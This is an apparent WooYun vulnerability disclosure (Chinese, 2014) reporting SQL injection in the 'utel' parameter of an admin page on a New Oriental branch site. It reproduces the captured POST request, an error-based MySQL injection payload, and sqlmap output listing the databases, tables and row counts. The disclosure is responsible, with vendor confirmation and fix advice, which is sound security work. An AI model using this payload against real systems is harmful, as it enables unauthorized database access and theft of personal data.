当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048349

漏洞标题:新东方某分站存在SQL注入漏洞导致信息泄露(多库)

相关厂商:新东方

漏洞作者: Mr.leo

提交时间:2014-01-10 18:22

修复时间:2014-02-24 18:22

公开时间:2014-02-24 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-10: 细节已通知厂商并且等待厂商处理中
2014-01-13: 厂商已经确认,细节仅向厂商公开
2014-01-23: 细节向核心白帽子及相关领域专家公开
2014-02-02: 细节向普通白帽子公开
2014-02-12: 细节向实习白帽子公开
2014-02-24: 细节向公众公开

简要描述:

新东方某分站存在SQL注入漏洞导致信息泄露(多库)

详细说明:

站点:
http://20zn.sz.xdf.cn/admin/admin_login.php
utel参数没有过滤,导致注射
burp抓包数据
POST /admin/admin_registerList.php HTTP/1.1
Content-Length: 229
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://20zn.sz.xdf.cn/admin/admin_login.php
Cookie: PHPSESSID=oh6apane20en4s01h6odj2ai81
Host: 20zn.sz.xdf.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
ac=add&classCode%5b%5d=94102&classCode_id%5b%5d=0&money=1&regionID=0&uid=0&uname=vubetqan&utel=555-666-0606
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: utel
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: ac=add&classCode[]=94102&classCode_id[]=0&money=1&regionID=0&uid=0&
uname=vubetqan&utel=555-666-0606 AND (SELECT 4881 FROM(SELECT COUNT(*),CONCAT(0x
3a66646d3a,(SELECT (CASE WHEN (4881=4881) THEN 1 ELSE 0 END)),0x3a7471783a,FLOOR
(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[09:12:14] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.5
back-end DBMS: MySQL 5.0
[09:12:14] [INFO] fetching current user
[09:12:14] [INFO] resumed: [email protected]/255.255.255.0
current user: '[email protected]/255.255.255.0'
[09:12:14] [INFO] fetching current database
[09:12:14] [INFO] resumed: cj_sz
current database: 'cj_sz'
[09:12:14] [INFO] fetching database names
[09:12:14] [INFO] the SQL query used returns 4 entries
[09:12:14] [INFO] resumed: information_schema
[09:12:14] [INFO] resumed: cj_cd
[09:12:14] [INFO] resumed: cj_sz
[09:12:14] [INFO] resumed: cj_zz
available databases [4]:
[*] cj_cd
[*] cj_sz
[*] cj_zz
[*] information_schema
Database: cj_sz
[7 tables]
+----------------+
| admin |
| message_log |
| prize |
| prize_type |
| register |
| register_class |
| school_region |
+----------------+
Database: cj_sz
+----------------+---------+
| Table | Entries |
+----------------+---------+
| register_class | 7163 |
| message_log | 5187 |
| register | 3168 |
| prize | 1335 |
| admin | 25 |
| school_region | 18 |
| prize_type | 5 |
+----------------+---------+

1343.jpg


另外一个库

1541.jpg


over

漏洞证明:

已经证明

修复方案:

1#修复注射漏洞
2#登录界面增加验证码

版权声明:转载请注明来源 Mr.leo@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-01-13 13:57

厂商回复:

谢谢提供消息,我们会尽快确认并修复。

最新状态:

暂无